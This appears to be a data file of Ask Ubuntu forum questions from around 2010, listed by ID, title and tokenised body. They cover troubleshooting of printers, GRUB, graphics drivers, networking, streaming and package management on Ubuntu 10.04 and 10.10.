15530	vlc 1.1.5 ca n't view png images	if i want to view a png file in the vlc player i get the error message : kein passendes decodierungsmodul : vlc unterstützt das audio- oder videoformat `` kein passendes decodierungsmodul : vlc unterstützt das audio- oder videoformat `` undf '' nicht . leider können sie daran nichts ändern. `` nicht . leider können sie daran nichts ändern .
15537	installing lexmark x1290 printer ?	i 'm trying to install the lexmark x1290 printer on a 64-bit ubuntu 10.10 system . i previously had this printer working flawlessly on a 32-bit ubuntu 10.04 . i 'm following the instructions from http : //www.trodrigues.net/wiki/linux : ubuntu : lexmark_x1290 and using the z600 series driver from lexmark . create a directory named lexmark and unpack the driver : mkdir lexmark tar -xvzf cjlz600le-cups-1.0-1.tar.gz extract the driver from the install script : tail -n +143 z600cups-1.0-1.gz.sh > install.tar.gz and untar it : tar -xvzf install.tar.gz this generates 2 drivers ( z600cups-1.0-1.i386.rpm and z600llpddk-2.0-1.i386.rpm ) that then should be converted to .deb files with alien and installed with dpkg , but -as the filenames already indicate- the drivers are for 32-bit systems and not for 64-bit systems . hence the error : $ sudo dpkg -i z600cups_1.0-2_i386.deb dpkg : error processing z600cups_1.0-2_i386.deb ( -- install ) : package architecture ( i386 ) does not match system ( amd64 ) errors were encountered while processing : z600cups_1.0-2_i386.deb any idea how i can get this to work ?
15538	why is my boot menu getting longer ?	this question is going to be little incomplete but i am sure you will guess what my problem is . so 2 days back when i restarted my machine i got 7 options on the boot screen instead of 5 . earlier windows was the 5th option ( i made it default ) , but now some memory test is the 5th option ( being defaulted ) . how did it automatically happen ? i didnt configure or changed anything .
15549	opencl programming on cpu and gpu with nvidia cards ?	i have a bi xeon machine with ubuntu 10.10 and a nvidia gtx 480 graphic card on it and i 'd like to use opencl on the cpu and the gpu . i installed the latest nvidia driver ( nvidia-current ) with apt-get and i downloaded and installed the latest cuda toolkit ( 3.2 ) from the nvidia page . but this allows me only to run opencl code on the nvidia gpu and not on the cpu . i then read some articles on the internet saying that the ati sdk is able to run opencl code on the cpu . i installed the latest version of ati drivers then tried to compile the sdk . i was then able to run code on the cpu but not on the gpu anymore . is there any way to run opencl code both on the nvidia gpu and the xeon cpu ?
15551	how to remove wine completely	how can i remove the wine folder and all the applications in that folder ? i 've tried via synaptic but it keeps showing up in the application menu .
15558	why does my webcam ( light ) turn on when i start up my computer after standby ?	hej when i close my lid on my lenovo sl500 laptop with in-built webcam , my computer goes on standby . when i start up again the webcam light turns on - for no reason . i 've found a way to make the light turn off again ; starting cheese webcam ( or probably any other webcam using program ) then the light turns off for a second and goes back on , and the program shows camera video . when i close the program the light turns off as well . can anybody tell me if my computer is actually turning on the webcam or just the light ? and what can i do to solve this problem ?
15559	what chat clients ( that work on linux ) support creating rooms ?	i need an alternative to skype ( i know of ekiga , but there is a problem in that anyone can join your ekiga room , and the rooms are not persistent as far as i know . if i am wrong , please let me know in a commment or answer , i 'd be happy to be wrong ( very happy ) ) . irc is fine too , but i would need instructions on how to do it ( freenode ? ) . whatever you suggest needs to be : free persistent crossplatform thanks in advance ; )
15563	rtmp protocol streaming can not connect	greetings , i am working on a clean install of ubuntu 10.10 maverick . i am trying to use vivu.tv 's webinar features , but i am consistently getting a connection error . this occurs on both lucid and maverick , using both chrome and firefox . we were able to test with the support team for vivu.tv , and we confirmed that it worked fine with http tunneling , but broke when they switched to rtmp . ( them using http tunneling is not an option , so i got to get my system to work with rtmp . ) you should be able to replicate this problem by going to this link : http : //vivu.tv/vivuweb/home/featuredarchives/ a box will begin a startup check , will stall on connecting to media servers , and then will display an error stating that it was unable to connect to the media server . this is a time sensitive issue for me , as i require access to several archived webinars for an important course i am developing . any help ?
15564	ubuntu comes with firewall by default ?	i understand the ubuntu comes with firwallul ufw is true ? there is a gui for it ? if so , what is his name and where do i download ? it is possible that ufw notify us ( like in windows with a pop-up windows ) when someone wants access to your pc or when an application wants to go out on the internet ? is there any firewall for ubuntu notify you when someone wants access to your pc or when an application wants to access the internet ?
15569	update manager error - authentication error	when i run update manager i get this error : this is what the error box says : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used.gpg error : http : //linux.dropbox.com lucid release : the following signatures were invalid : nodata 1 nodata 2 w : failed to fetch http : //linux.dropbox.com/ubuntu/dists/lucid/release w : some index files failed to download , they have been ignored , or old ones used instead .
15570	configure udev to change permissions on usb hid device ?	i have a usb scale , a usb hid . currently , when it is plugged in , the permissions only allow the superuser to access it . how can i configure udev to let anybody access this device ? i have the vendor and product ids , but i would like to match it based on the hid type instead . right now , i 'm having trouble finding any existing rule that applies to this ( i grepped for `` hidraw '' in /lib/udev/rules.d and /etc/udev/rules.d , among other things ) .
15572	how do you use qutecom to connect to other services ?	i read on wikipedia that it uses libpurple , but i ca n't figure out how to connect to other services ( like jabber for example ) . am i missing something or is the feature just not there anymore ?
15573	how to create file in a windows mounted partition ?	i can mount the windows partition in my ubuntu installation but i do n't seem to be able to create or paste files in to the mounted partition . i do n't know how to fix it . any ideas ?
15580	haproxy does n't start	installed a new ubuntu 10.04 server and logging in as root i installed haproxy using apt-get . i can run haproxy directly as a daemon but when i do /etc/init.d/haproxy start nothing happens.. not even an error message . netstat -a shows nothing is using the http port i 'm trying to balance with haproxy ... ideas ? edit i noticed that apt-get install haproxy says this in the end : update-rc.d : warning : /etc/init.d/haproxy missing lsb information update-rc.d : see http : //wiki.debian.org/lsbinitscripts /etc/default/haproxy says enabled=1 debugging output for sh -xv /etc/init.d/haproxy start # ! /bin/sh # # chkconfig : - 85 15 # description : ha-proxy is a tcp/http reverse proxy which is particularly suited \ # for high availability environments . # processname : haproxy # config : /etc/haproxy.cfg # pidfile : /var/run/haproxy.pid # source function library . if [ -f /etc/init.d/functions ] ; then . /etc/init.d/functions elif [ -f /etc/rc.d/init.d/functions ] ; then . /etc/rc.d/init.d/functions else exit 0 fi + [ -f /etc/init.d/functions ] + [ -f /etc/rc.d/init.d/functions ] + exit 0 root @ li267-63 : ~ #
15581	how to run applications on admin account while is not is use or active ?	i want to have applications running ( like deluge ) in admin account even if admin account is not active or it 's guest account or family account is in use . some times family account is in use and pc is restarted for any reason so admin appl wont start on the back gorund . is there a ways to make this possible ?
15584	off-line repository and software removal	i read up on the process here and came up with this script : for i in `ls -1 /var/cache/apt/archives` ; do sudo cp /var/cache/apt/archives/ $ i /home/jj/documents/repository ; done and to re-install : sudo dpkg -i /home/jj/documents/repository/*.deb question : how can i remove these ( and their dependencies ? ) via a script before the re-install ? aisleriot evolution evolution-common evolution-data-server evolution-exchange evolution-indicator evolution-plugins gbrainy gnome-mahjongg gnome-sudoku gnomine gwibber gwibber-service libevolution openoffice.org-draw openoffice.org-impress quadrapassel thank you for your time . i now see this link of which i chose this method : sudo apt-get remove -y $ package and probably cleandeb afterwords . advice ? suggestions ? thank you !
15591	resources for making an ubuntu-based router ?	i need a dead simple ( read dumbies ) guide to setting an ubuntu 10.10 machine up as a router . here 's the scenario : i have several ubuntu 10.10 vm 's that run on the same virtual network . i want them all to use one of the vm 's as a router . that machine will be the only one able to access real network resources and the internet . problem is , i 've never set a router up on a linux box . i 'm sure it 's very easy but i 'd like to get the simple-mans guide if there is one . i 'm sure it 's out there somewhere . thanks in advance !
15593	ipod touch firmware downgrade	is it possible to downgrade my ipod touch firmware ( from 4.2 to 4.0 ) from ubuntu ?
15603	will unity offer synapse goodness ?	the synapse launcher was recently released , offering the following features : search and open apps and items . run any command . directory search - allows opening of commonly used directories gnome session - log out , shut down , restart browse recent elements logged by zeitgeist . hybrid search - complete zeitgeist results by searching for similar files will unity 's dash and search offer all these items ? also , will unity , using places , be able to offer additional features such as this one , also from synapse ? banshee - allows you to play/enqueue music files in banshee
15608	why wo n't visual effects work with a dual monitor setup	i am running ubuntu 10.10 with a intel 945gme express integrated graphics controller ( rev 03 ) and i can not use visual effects when i have both monitors turned on . when i use the visual effects control to change it back to normal or extra the screens flicker and the checkbox stays on what i selected , but it does n't actually activate , and when i re-open the dialog , it 's back on none . is it just that my video card ca n't handle it , or is there a bug here that needs fixing ?
15612	where does compiz log error messages ?	i 'm having some trouble with compiz and dual monitors ( see why wo n't visual effects work with a dual monitor setup ) , and i 'd like to check the compiz logfiles to see what , if anything , might be happening to cause it to stop working , but i 'm not sure where compiz logs its error messages to .
15614	powering down usb drive while pc suspended	is it safe , with respect to the data on a usb drive , to power it down while the computer is suspended , and then power it back up before resuming ? e.g . are buffers on the usb drive flushed as part of the suspend procedure ? are there likely to be any other unfortunate side effects ? specifically under maverick `` 10.10 '' meerkat , with an ide ( pata ) drive , but of course it would be useful to get info on a variety of setups . note : by `` suspend '' i mean the s3 , `` mem '' sleep state . however , answers pertaining to hibernation ( s4 ) would also be helpful .
15617	how do i add applications to the messaging menu ?	i would like to have an application appear in the messaging menu that is not installed there by default , is there a way to do that on a per-user basis ?
15618	repercussions to sharing .bashrc across machines with dropbox ?	i work on a lot of different machines , all running ubuntu ( not always the same version ) . i have some really basic customizations to my prompt i would like to have available on all machines . i currently use dropbox and store all my other `` dot files '' there , such as my .vim/ .vimrc .gitconfig .ackrc . i then just link them to my home folder from my dropbox folder . voilă , all machines in sync . i am unsure what the repercussions of doing something like this with my bashrc is . can any one offer suggestions ? maybe an easy way to load a separate file in the bashrc ?
15620	'htop ' does not show the correct cpu % , but 'top ' does	while running mencoder with threads=4 ( on a quad-core cpu ) . i 've noticed that htop does not show its true cpu usage , but top does . it seems that htop is only reporting on one core . is this a bug/limitation of htop ? what is going on here ? there are no other entries for mencoder show up in ps or htop or top . i assume that 100 % means that 1 core is maxed out , but even this seems odd to me ; what about the other cores ? update : added `` system monitor '' output pid % cpu command `` top '' 1869 220 mencoder `` htop '' 1869 95 mencoder -noodml /media/ ... '' system monitor '' 1869 220 mencoder
15624	how to take screenshots of sections of the screen ?	on mac os x , there is a handy key combo for taking a screenshot of any arbitrary rectangle section of the screen ( command-shift-4 ) . is there something similar ( maybe compiz plugin ) for ubuntu/gnome ?
15626	boot existing sda1 from usb	i can manually boot my sole ubuntu 10.10 install from my usb stick typing the following commands : set root= ( hda0 ) linux /vmlinux root=/dev/sda1 ro initrd /initrd.img boot what i was hoping for is to have the usb do it for me . no typing required ... ? i followed directions from these urls ( most did n't work ) grub on a bootable usb rescue stick how to install grub 2 to usb drive / pendrive grub2 and usb flash drives how to recover grub2 linux and some pretty extensive searching here . there 's 10 pages at 50 per page . i did what i could and now turn to the experts . summary of steps used to make usb boot to grub2 , so far ... mkdir -p /media/grub2_rescu/boot/grub sudo cp /usr/lib/grub/i386-pc/* /media/grub2_rescu/boot/grub echo ' ( hd0 ) /dev/sda ' > /media/grub2_rescu/boot/grubdevice.map sudo grub-install -- root-directory=/media /dev/sdb sudo grub-mkconfig -o /media/grub2_rescu/boot/grub/grub.cfg thank you for your time .
15627	how to install ubuntu one windows beta on xp ?	i am trying to install the ubuntu one windows beta program on windows xp , but i keep getting the following error : '' this installation package can not be installed by the windows installer service . you must install a windows service pack that contains a newer version of the windows installer service . '' i have xp sp3 installed , and fully updated . any ideas ?
15634	developer documentation for the messaging menu ?	the only documentation i have been able to find on integrating an application with the messaging menu is old and out of date : http : //gnomejournal.org/article/67/an-introduction-to-the-message-indicator . and even that did n't have documentation for the whole api . is there are any documentation for libindicate , either the python or c version ?
15639	how to take a screenshot of a whole desktop with app menu selection ?	i want to take a screenshot of a whole desktop with applications menu selection.how to do this ?
15644	how to sync files/data between two pcs on a home network ?	i have a desktop and a laptop with almost the same files within their home directory . sometimes i make changes in ~/music , ~/documents , etc . but these changes of course do n't affect the other machine . so i want to have a solution to sync all the data in the home folders of my laptop and desktop . i can connect them with cross cable once in a while . i do n't want to use ubuntu one or dropbox ( the files are big , and there 's no need to use the internet when both are on a home network ) .
15647	where can i find the kernel logs ?	anybody know the best way to write/read/commit/document/upload errors in the kernel log in ubuntu 10.04 ? are there a tool suitable for this type of job in the ubuntu software repositories ?
15648	how to type hindi in open office ?	i m using ubuntu 10.10. please tell me how to type in hindi fonts in open office word . please help
15653	no effect after editing grub.cfg & updating it	i 've reached a dead end in this matter & i was wondering if someone out there could help me out . i located the grub file located in etc/default and edited it following reliable instructions . after i do & run the sudo update-grub & reboot , nothing changes & it stays the same . i even have an application called `` start-up manager '' to simply adjust let 's say the time-out , sadly that did n't work either . could someone help me out ? note : i do have this thing called burg to have a gui when booting , but even before i installed it the problem was there . here 's my grub.cfg : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=1 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' vga=775 '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=800x600 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' files in etc/grub.d : 00_header , 05_debian_theme , 10_linux , 20_linux_xen , 20_memtest86+ , 30_os-prober , 40_custom , 41_custom , readme boot/grub/grub.cfg http : //pastebin.ubuntu.com/538608/
15655	updates do n't install because of `` untrusted packages ''	i have `` darktable + extras '' installed ( i added their ppa repository to the sources manually ) . the extras include a tool called exiv2 . now i get an update , full of important packages . at the end of the list , there is exiv2 . when i click `` install updates '' , i get when i click close , nothing happens . i guess the usual updates will get installed if i uncheck exiv2 , but if darktable works better with an updated exiv2 , i want to update it too . how do i get the update manager to accept the update ?
15660	are there other automator alternatives ?	i want something that records ( like macro ) the gui actions and keystrokes that can be played later to accomplish same actions . something like automator in os x. i have already looked into alternative for mac os x automator ? i have tried gnee , but that does n't seem to work , tried several times but i guess its kinda buggy , i also tried sikuli but that needs coding .
15664	why have my google chrome extensions all been put into a tiny dropdown ?	on my windows pc in my office , my chrome extensions are all along the toolbar as they always have been , however on my ubuntu machine at home they are now in a dropdown next to the spanner icon . it 's a bit annoying as i ca n't see when i have new mail , tweets etc . chrome version 7.0.517.44 if anyone knows how to resolve this it would be much appreciated . thanks , drew
15667	where is libapache2-mod-qos ?	i wish to install mod_qos in ubuntu server 10.10 . reading on-line it would seem the package is called libapache2-mod-qos and is in the universe repository . having enabled universe and performing a sudo apt-get update it still can not be found , and the listing for aptitude search libapache2 does not show it under another name . has it really been taken out of the repos ( in desperation i temporarily enabled every repo and updated to no avail ) ? if not does it have an obscure name now or are we meant to use a ppa ?
15669	clipped notify osd	for the last few weeks i 've been having some problems with my notify osd.the right and bottom side are clipped . i 've tried to reinstall notify osd several times but without luck . i 've tried to look all over the place on how to resolve this problem and the only thing i keep finding is xorg-edgers related , saying that the latest pixman did n't work and you needed to download an older version . which they have removed . i 've also purged and removed xorg-edgers content months ago . videocard i use is an ati radeon hd 4350 which is n't a videocard at the top of the list when it comes to support : ) currently using ati/amd proprietary fglrx graphics driver .
15671	ubuntu usb startup disk does n't boot	i 've been wanting to try out kubuntu and kubuntu mobile phone preview , so i 've created a usb startup disk ( two rather ) as usual . but it does n't boot : these are the kernel messages i get . at the time this picture is taken ( maybe half a second after it 's started booting ) , the system is utterly locked ; caps lock does n't turn on it 's light and the magic sysrq keys do n't do anything . i know there is a known bug concerning booting a 10.04 image created in 10.10 , it 's in the release notes , but this is a maverick image - and the bug report does look quite different from what i 'm getting . i 've tried it with the normal ubuntu 10.10 desktop image as well , just to be sure - it 's the exact same error ( s ) . also , booting from a live cd works as expected . the usb drive is formatted with fat32 , msdos partitioning table . usb legacy mode is turned on in the bios of this machine , otherwise it wo n't boot from usb . i should also mention , because the error might be connected to acpi , that i ca n't turn off acpi in the bios .
15672	how to install packages offline ?	i googled and found keryx- http : //keryxproject.org/ but it does not support ubuntu 10.10 x64 . is there other way to install packages on ibuntu 10.10 64 bit offline ?
15675	how to install arista transcoder from source ?	this package is not in software center . official page offer only source files . how can i install this on 10.04 ?
15676	automatically adding cd box art so that i can put it on my ipod	i know it 's possible to automatically find cd covers for albums , because rhythmbox is doing it on the fly . ( when i listen to stuff , it finds the cd cover online ... ) what i want is to get this information onto my ipod . as it stands pretty much all my songs have the default blank cd cover ... i use gtkpod to transfer music to it . this needs to be an automatic process , because i have a large music library and i 'm lazy and it 's not exactly an important thing ... i rip cds i buy with the basic cd extractor , so all the files are in a artist/album/song.mp3 structure . ( yes i know , mp3 is evil , but ipod does n't like .ogg so whatever )
15680	what 's keeping shotwell from replacing eog ?	i have noticed that shotwell has a pretty capable image viewer but eog is still used for opening image files , which means ubuntu 's default install has two apps for the same purpose . i wonder why shotwell is n't set as the default image viewer and eog is removed . are there certain features that eog has and shotwell lacks , which are keeping it from being set as default ?
15681	converting .c module to .o module	i 'm using ubuntu 10.10 and the installed kernel for driver programming . in rubini 's book it is mentioned to create a .o file from a .c file , but i 'm not getting it . it uses obj-m : = eg_drv1.o , but when i try and build the .c file i get this : error : make : *** no targets . stop . i 'm completely confused . first question i have is how do i convert a .c file to .o file and then to .ko file to use the module ?
15686	can process be reloaded by pid ?	i run a daemon which can not be restarted via init.d or service command . is there a way to restart a process just by passing a process id to some command ?
15693	incorrect key mappings in remote nx session	i 'm using the nomachine provided nx client on ubuntu 10.10 running on a laptop . i 'm connecting to a freenx server that happens to be running on opensuse . i 'm having trouble with keys being incorrect in the remote session . the most noticable example is that when i press up cursor , the screen shot dialog appears instead . as far as i can gather easily , the cursor keys and delete are affected . it 's worth noting that it does n't display the same behaviour if i dual boot to windows xp , or from a different machine using opensuse . i 'm not really sure where to begin looking . any suggestions ?
15694	how do i disable intel graphics in a hybrid graphics setup ?	i have a dell vostro 3700 version a10 . the relevant bits from lspci -v | grep vga are : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 330m ] ( rev a2 ) so as you can see this is one of those hybrid graphics laptops . now , i have no interest in any kind of switching . i would like to completely disable the intel graphics thats on the processor . i checked in the xorg.log file and it shows that the intel card is in use . from lsmod i see it uses the i915 module . i tried blacklisting that module in /etc/modprobe.d/blacklist.conf but that did n't really work because i still could n't use the nvidia card for display . i wish there was a bios option to disable , but there is n't . some people have also suggested changing the sata mode to compatibility , but that does not work either in this case as the intel vga controller still shows up in lspci i tried setting the busid manually in the /etc/x11/xorg.conf file but it still did n't work . it gave me an error that said something along the lines of screen not detected . any bits of xorg.log that you 'd like me to attach ? so what i am looking for is some solution that allows me to completely disable the use of the intel vga controller . if it was blocked somehow it 'd be nice . as if it were not present . any suggestions ? i am desperate here actually . because i can not use the hdmi port right now on my laptop for that reason . my guess is this applies to desktops that also have core i5 processors with onchip graphics as well as dedicated graphics cards . how would they go about solving the problem ?
15710	ubuntu one for xfce or xubuntu ?	is it possible to use ubuntu one with xfce/xubuntu without installing too many gnome dependencies like nautilus ?
15712	how do i run a script/command on suspend ?	i 'm running ubuntu 10.04 and the gnome-do docky applet . for some reason every so often ( sometimes after one , sometimes after several suspends ) when i wake up from a suspend ( i 'm on a laptop , so every time i close the screen in-between my classes ) gnome-do starts devouring the cpu . trying to use the quit button on gnome-do does n't work , i have to kill -1 the process . apparently it 's been a problem for several people as there is at least one bug report . according to the bug report it 's been fixed , but the release has n't been pushed into the ppa . so my idea was to have the suspend script kill gnome-do automagically and then i 'd just have to start it up again when i wake up ( or set that in a wakeup script ) . unfortunately my google-fu seems to fail me - i 've found plenty of info about shutdown and logout , but nothing on suspend . any pointers ? thanks !
15716	ssh without opening the ports	i usually provide solutions for my friends for fixing issues on their ubuntu machines . most of them use shared internet connection over lan where they can not open ports for allowing me access their machines over ssh . is it possible to ssh into a machine without opening ports . for example services like teamviewer allow users to just accept a connection request from outside , and if the owner of the machine permits , then the machine can be used by authenticated users . so , similarly , if the owner of the machine permits , with some kind of authentication , one should be able to get ssh access to a machine without opening the ports on the nat router .
15718	help me solve my problem with npr media player	first of , let me apologize for this getting a bit technical . several weeks ago , i found that while using npr 's media player ( e.g . click on 'listen to the show ' - this is what i 've been using as a test ) the stream would suddenly halt after a minute or three . i could not get the stream to restart without reloading the page . now , i assumed this was an issue with npr 's player and linux ( or just a bug in their stuff in general ) so i began to dig , the following is what i have tried to date ( please note , the tldr ; option is to skip to the latest thing as i think i know what is causing the problem ) . note : all testing has been done , for consistency purposes , on a clean install of chromium with no pluggins running . my machine is ubuntu 10.10x64 . first thing i always try , i disabled all firewall stuff on the system ( ufw , default deny all , allow ssh ) . no change , firewall back up for all additional tests unless otherwise noted . in any case , ufw is stateful , so connections it started on a non-specified on different ports will continue to work . i deleted my ~/.macromeda and ~/.adobe folders , restarted ( just to be sure ) and tried . program still froze . i decided the problem might be with my install of flash , so i purged the version i had ( and the home folders again ) . i installed the x64 version of flash from a ppa . this had no effect . i decided that the problem might be with the version of flash , so i purged the x64 version and installed the standard x32 version that comes with ubuntu . no luck . back to the x64 version for consistency , i decided to set up a 64-bit mini 'clone ' of my system in virtualbox . i was able to run the media player with no problem . i rsynced ( in archive mode ) my home directory from my real machine to the virtual machine ( with bridged networking , so it was fully visible on the network ) . i also used a few tricks to install all of the same software ( and repositories ) from the real machine to the virtual machine . i was still able to listen to the player . i decided that the problem was with my install ( after all , it had gone through two major version upgrades ) . as i have /home/ on a separate partition it was easy to reinstall and use the same trick from # 6 to have my system up and running again within about an hour . i continue to have issues with the npr media player . by this point the weekend had come . at work , i use a wired connection while at home i use a wireless connection . for some reason i forgot that i was having problems and used the npr media player over the weekend . low and behold it worked just fine at home on wireless ( note : for various reasons , i could not test this on wired at home ) . following from # 6 , i decided that the problem was either something with the network at work or still something with my account . as the latter was easier to test , i created a new account on my system and used that at work . the media player worked . at a loss , i decided to watch the traffic with tshark ( the text based brother of wireshark ) - x 's to protect the innocent , i am the xxx.24.200.xxx : sudo tshark -i eth0 -p -t a -r `` ip.addr == xxx.24.200.xxx & & ip.addr == xxx.166.98.xxx '' as you would expect , there were tons and tons of packets , but each and every time the player froze , this is what i got 08:42:20.679200 xxx.166.98.xxx - > xxx.24.200.xxx tcp macromedia-fcs > 56371 [ psh , ack ] seq=817686 ack=6 win=65535 len=1448 tsv=495713325 tser=396467 08:42:20.718602 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=396475 tser=495713325 08:42:21.050183 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495713362 tser=396475 08:42:21.050221 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=396508 tser=495713362 08:42:21.680548 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495713425 tser=396508 08:42:21.680605 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=396571 tser=495713425 08:42:22.910354 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495713548 tser=396571 08:42:22.910400 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=396694 tser=495713548 08:42:25.340458 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495713791 tser=396694 08:42:25.340517 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=396937 tser=495713791 08:42:30.170698 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495714274 tser=396937 08:42:30.170746 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=397420 tser=495714274 08:42:39.801738 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495715237 tser=397420 08:42:39.801784 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=398383 tser=495715237 08:42:59.032648 xxx.166.98.xxx - > xxx.24.200.xxx tcp [ tcp zerowindowprobe ] macromedia-fcs > 56371 [ ack ] seq=819134 ack=6 win=65535 len=1 tsv=495717160 tser=398383 08:42:59.032696 xxx.24.200.xxx - > xxx.166.98.xxx tcp [ tcp zerowindowprobeack ] [ tcp zerowindow ] 56371 > macromedia-fcs [ ack ] seq=6 ack=819134 win=0 len=0 tsv=400306 tser=495717160 08:43:00.267721 xxx.24.200.xxx - > xxx.166.98.xxx tcp 56371 > macromedia-fcs [ fin , ack ] seq=6 ack=819134 win=0 len=0 tsv=400430 tser=495717160 08:43:00.267827 xxx.24.200.xxx - > xxx.166.98.xxx tcp 56371 > macromedia-fcs [ rst , ack ] seq=7 ack=819134 win=65535 len=0 tsv=400430 tser=495717160 so , as you can see , my machine is sending out a zerowindow packet ( which i think means some buffer or another filled up ) which causes the media player to halt ( unfortunately , terminally - no controls on it really do anything anymore ) . any ideas , at all , what would cause this ? why only on eth0 under my main account ?
15719	where are the system-wide proxy server settings ?	i access my internet connection through through a proxy server . all i need to enter is http address and port . where can i enter these for system-wide settings ? note : this question and answers apply only to the default ubuntu desktop environment , known as unity . these steps will not work for xubuntu , lubuntu , kubuntu or other variants . for xubuntu/ubuntu studio , please see this question . for lubuntu , see this question .
15725	how to add blender menu item in main menu ?	downloaded blender . how can i add menu item with blender icon in main menu ?
15727	can i use pitivi to trim a video , without re-encoding it ?	i would like to take a video i have and remove some parts of it , that is , produce a new video that is basically the same as the original but removing some parts . avidemux seems to let you do this easily : just open the video , select a start and end frame , and hit save . this does n't seem to be the case with pitivi , though : `` save '' does n't save a video , but a project ; to save the video i have to hit `` render project '' , and then i 'm seemingly forced to re-encode the video because pitivi just wo n't save the video `` as it was '' . is this indeed the way pitivi works , or am i missing something here ?
15728	download speed decreased	i 'm using ubuntu 10.10 and i like it . but since yesterday i have a problem with the downloadspeed via my router . the normal speed is over 10mbit/s and i reached this speed always with ubuntu . since yesterday is have less than 1mbit/s . the windows pc in the same wifi network still reaches over 10mbit/s . do n't know what happened to my ubuntu installation . anyone can give me some help to fix the problem ? update : i tried to install ndiswrapper but it did n't work with the original windows driver from the manufacturer of my wlancard . then i deinstalled . now at the moment the state is that ubuntu does n't recognize the wlan card since it has deleted the standart driver when i activated ndiswrapper . i need an advice to activate the original driver ( sudo modprobe wl does n't work , fatal : module wl not found ) now i managed to reload the original driver via modprobe wifimodulename wifi works again . changed issue : i now use the backport wireless drivers and i have the full wifi speed now again but sometimes after a time i use the wifi connection the speed again decreases to under 1mbit or even more bad to under 0.1mbit . when i deactivate wifi connections via network-manager-applet and reactivate it , it again has the full speed .
15730	how to enable dual monitors with two ati radeon 4350 hd graphics cards ?	i have bought two ati radeon 4350 hd graphics cards and they both work well seperately . but only the first one will output most of the time . if i go to system - > appearance - > monitors it will only detect the monitor on the first graphics card . i have check using hardinfo and the system has definitely detecting both of the graphics cards so i do n't know why it is n't detecting the monitor . i am running maverick 64 bit
15734	how to install libflashplayer.so ?	i can not figure out how to install adobe flashplayer plugin in firefox 3.6.3 . i downloaded libflashplayer.so , have read a few forums for ways to install but nothing so far has worked . one of the ways i 've tried is to copy the .so file to the firefox plugin folder but my system does not allow me to copy anything into that folder . thanks , -h .
15735	can i use my ubuntu one account to backup with déjà dup ?	i would like to use my ubuntu one account to back up some files with déjà dup . is this possible ?
15738	are the any commercially available , easy to use , media servers running ubuntu ?	this thing is one of the be-all-end-all solutions to people wanting to access their multimedia files around their house , but it runs windows home server . is there any similar device out there running ubuntu server , some variation on ubuntu , or a version of linux at the very least ? the whole idea behind the windows based media centres that are out there is that you spend as little time as possible configuring them ( in theory , if you have a windows home , they should just work ) . an ubuntu ( linux ) based alternative should have the same sort of 'take it out of the box and start playing ' setup . what are my options ?
15741	ubuntu samba server problems	i 'm currently setting up a samba server on an old school computer for my photo class but i tried to setup samba and it did n't allow me to install the necessary things to get samba rioting . i was wondering if i could make a live cd of ubuntu server with all of the proper things installed so i can install it and just start creating users .
15749	alternative to dragon naturally speaking ?	is there a ubuntu alternative for this program ?
